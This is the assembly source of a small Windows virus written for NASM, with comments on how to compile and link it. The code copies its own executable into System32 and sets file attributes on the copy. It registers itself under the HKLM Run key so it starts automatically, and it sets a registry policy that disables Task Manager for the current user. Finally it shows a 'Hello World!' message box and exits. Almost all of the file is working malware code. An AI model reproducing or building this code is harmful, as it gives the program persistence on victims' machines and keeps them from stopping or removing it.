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it unlocks many cool features!
- ; 1. get libs form MS SDK or MASM32 package
- ; 2. nasm virus.asm -fwin32
- ; 3. a) msvc:
- ; link.exe virus.obj "%LIBPATH%\kernel32.lib" "%LIBPATH%\user32.lib" "%LIBPATH%\advapi32.lib" /ENTRY:main /SUBSYSTEM:WINDOWS
- ; 3. b) cygwin/gcc:
- ; gcc virus.obj "$LIBPATH/kernel32.lib" "$LIBPATH/user32.lib" "$LIBPATH/advapi32.lib" -mwindows -nostdlib -Xlinker -e_main -s -o virus.exe
- section .data data align=4 ;read/write
- Key_Value dd 0x01
- Virus_Name dd "\virus.exe",0x00
- length equ $-Virus_Name
- Reg_Name dd "Virus",0x00
- Run dd "Software\Microsoft\Windows\CurrentVersion\Run",0x00
- Task_Man dd "Software\Microsoft\Windows\CurrentVersion\Policies\System",0x00
- Task_Man_Key dd "disabletaskmgr",0x00
- szTitle dd "Virus:",0x00
- szText dd "Hello World!",0x00
- section .bss bss align=4 ;read/write
- Virus_Handle resd 1
- Key_Handle resd 1
- String_Length resd 1
- Virus_Path resb 260
- Sys_Dir resb 260
- ;section .rdata rdata align=4 ;read
- section .text code align=16 ;read/execute
- global _main
- ;kernel32.dll
- extern __imp__ExitProcess@4
- extern __imp__GetModuleHandleA@4
- extern __imp__GetModuleFileNameA@12
- extern __imp__GetSystemDirectoryA@8
- extern __imp__CopyFileA@12
- extern __imp__SetFileAttributesA@8
- ;user32.dll
- extern __imp__MessageBoxA@16
- ;advapi32.dll
- extern __imp__RegCreateKeyExA@36
- extern __imp__RegOpenKeyExA@20
- extern __imp__RegSetValueExA@24
- extern __imp__RegCloseKey@4
- section .code USE32
- _main:
- push 0x00
- call [__imp__GetModuleHandleA@4]
- mov [Virus_Handle],eax ;Get Handle of virus
- push 0x0104 ;MAX_PATH
- push Virus_Path
- push dword [Virus_Handle]
- call [__imp__GetModuleFileNameA@12] ;Get path of virus
- push 0x0104 ;MAX_PATH
- push Sys_Dir
- call [__imp__GetSystemDirectoryA@8] ;Find System32
- mov edi,Sys_Dir
- add edi,eax
- mov esi,Virus_Name
- mov ecx, length
- cld
- repe movsb ;Append virus name to system32 path
- push 0x00
- push Sys_Dir
- push Virus_Path
- call [__imp__CopyFileA@12] ;Copy Virus
- push Sys_Dir
- call [__imp__SetFileAttributesA@8] ;Set virus attributes
- push Key_Handle
- push 0x0002 ;KEY_SET_VALUE
- push 0x00
- push Run
- push 0x80000002 ;HKEY_LOCAL_MACHINE
- call [__imp__RegOpenKeyExA@20] ;Open Run key
- mov edi,Sys_Dir ;Calculate size of string and store in ECX
- mov ecx,-1
- xor al,al
- repne scasb
- sub edi,Sys_Dir
- push edi
- push Sys_Dir
- push 0x01
- push 0x00
- push Reg_Name
- push dword [Key_Handle]
- call [__imp__RegSetValueExA@24] ;Set registry value
- push dword [Key_Handle]
- call [__imp__RegCloseKey@4]
- xor eax,eax
- mov dword [Key_Handle],eax ;Clear Key handle
- push 0x00
- push Key_Handle
- push 0x00
- push 0x20006 ;KEY_WRITE
- push 0x00
- push 0x00
- push 0x00
- push Task_Man
- push 0x80000001 ;HKEY_CURRENT_USER
- call [__imp__RegCreateKeyExA@36]
- push 0x04
- push Key_Value
- push 0x04 ;REG_DWORD
- push 0x00
- push Task_Man_Key
- push dword [Key_Handle]
- call [__imp__RegSetValueExA@24] ;Disable taskmanager
- push dword [Key_Handle]
- call [__imp__RegCloseKey@4]
- push 0x00|0x40 ;MB_OK|MB_ICONINFORMATION
- push szTitle
- push szText
- push 0x00
- call [__imp__MessageBoxA@16] ;Popup Info box
- push 0x00
- call [__imp__ExitProcess@4] ;Exit
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